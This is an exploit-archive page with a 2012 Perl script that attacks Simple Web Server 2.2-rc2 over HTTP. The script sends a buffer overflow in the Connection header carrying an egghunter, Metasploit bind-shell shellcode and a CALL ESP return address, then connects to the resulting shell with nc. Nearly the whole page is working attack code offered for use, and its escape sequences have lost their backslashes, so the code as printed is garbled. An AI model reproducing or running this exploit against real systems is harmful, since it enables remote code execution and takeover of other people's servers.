Simple Web Server 2.2-rc2 ASLR Bypass Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Simple Web Server 2.2-rc2 ASLR Bypass Exploit
# Published : 2012-08-28
# Author :
# Previous Title : Sflog! CMS 1.0 Arbitrary File Upload Vulnerability
# Next Title : SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow

use IO::Socket; 

# Exploit Title: SWS 2.2-rc2 - Remote code execution Egghunting + ASLR bypass
# Date: 28/8/2012
# Special Regards to Mr.pr0n ,Corelan team , immunity u guys are first !!! based on a POC by MR. Pr0n
# Author: pole
# Tested on Windows 7 32bit
# NOTE : If exploit is not running properly configure the server on other http ports like here i have used #8000 http ... and keep checking the server is "GREEN" enabled ! 
print "Exploit by Dhruval n";

if (@ARGV != 2)
{
   print "n[-] Usage: $0 <target ip> <port> nn";
   exit();
}

$target = $ARGV[0]; # Target IP
$port 	= $ARGV[1]; # Target port

$egghunter  =
"x66x81xCAxFFx0Fx42x52x6Ax02".
"x58xCDx2Ex3Cx05x5Ax74xEFxB8".
"w00t". # The 4 byte tag!
"x8BxFAxAFx75xEAxAFx75xE7xFFxE7";
 
# MSF windows/shell_bind_tcp LPORT=4444
$shellcode =
"xdaxc5xd9x74x24xf4x2bxc9xbax3ax04xccxb6x5e".
"xb1x56x31x56x19x83xeexfcx03x56x15xd8xf1x30".
"x5ex95xfaxc8x9fxc5x73x2dxaexd7xe0x25x83xe7".
"x63x6bx28x8cx26x98xbbxe0xeexafx0cx4exc9x9e".
"x8dx7fxd5x4dx4dx1exa9x8fx82xc0x90x5fxd7x01".
"xd4x82x18x53x8dxc9x8bx43xbax8cx17x62x6cx9b".
"x28x1cx09x5cxdcx96x10x8dx4dxadx5bx35xe5xe9".
"x7bx44x2axeax40x0fx47xd8x33x8ex81x11xbbxa0".
"xedxfdx82x0cxe0xfcxc3xabx1bx8bx3fxc8xa6x8b".
"xfbxb2x7cx1ex1ex14xf6xb8xfaxa4xdbx5ex88xab".
"x90x15xd6xafx27xfax6cxcbxacxfdxa2x5dxf6xd9".
"x66x05xacx40x3exe3x03x7dx20x4bxfbxdbx2ax7e".
"xe8x5dx71x17xddx53x8axe7x49xe4xf9xd5xd6x5e".
"x96x55x9ex78x61x99xb5x3cxfdx64x36x3cxd7xa2".
"x62x6cx4fx02x0bxe7x8fxabxdexa7xdfx03xb1x07".
"xb0xe3x61xefxdaxebx5ex0fxe5x21xe9x08x2bx11".
"xb9xfex4exa5x2fxa2xc7x43x25x4ax8exdcxd2xa8".
"xf5xd4x45xd3xdfx48xddx43x57x87xd9x6cx68x8d".
"x49xc1xc0x46x1ax09xd5x77x1dx04x7dxf1x25xce".
"xf7x6fxe7x6fx07xbax9fx0cx9ax21x60x5bx87xfd".
"x37x0cx79xf4xd2xa0x20xaexc0x39xb4x89x41xe5".
"x05x17x4bx68x31x33x5bxb4xbax7fx0fx68xedx29".
"xf9xcex47x98x53x98x34x72x34x5dx77x45x42x62".
"x52x33xaaxd2x0bx02xd4xdaxdbx82xadx07x7cx6c".
"x64x8cx8cx27x25xa4x04xeexbfxf5x48x11x6ax39".
"x75x92x9fxc1x82x8axd5xc4xcfx0cx05xb4x40xf9".
"x29x6bx60x28x23";

$junk 		= "x41" x (2048 - length("w00tw00t") - length($shellcode));
$ret		= pack('V',0x6FC8E251);     	# CALL ESP - libstdc++-6.dll Non Aslr
#$ret = pack('V',0x7C82385D); #call ESP
#$ret = pack ('V',0x75560D1B); #call ESP ASLR AWARE :)
$nops 		= "x90" x 20; 			# 20 nops.
$exploit   	= $junk."w00tw00t".$shellcode.$ret.$nops.$egghunter;

if ($socket = IO::Socket::INET->new
     (PeerAddr => $target,
      PeerPort => $port,
      Proto => "TCP"))
{
   $header =
        "GET / HTTP/1.1rn".
        "Host: ".$target." rn".
        "Connection:".$exploit."rn";
	print "n[+] Sending buffer (".(length($exploit))." bytes) to: $target:$port n";
        print $socket $header."rn";
        sleep(1);
        close($socket);
	print "[+] Exploitation Done!n";
	print "[+] Please, wait couple of sec ...n";
	sleep(1);
	print "[+] Got shell?nn";
        $command = "nc $target 4444";
        system ($command);
}
 
else
{
    print "[-] Connection to $target failed!n";
}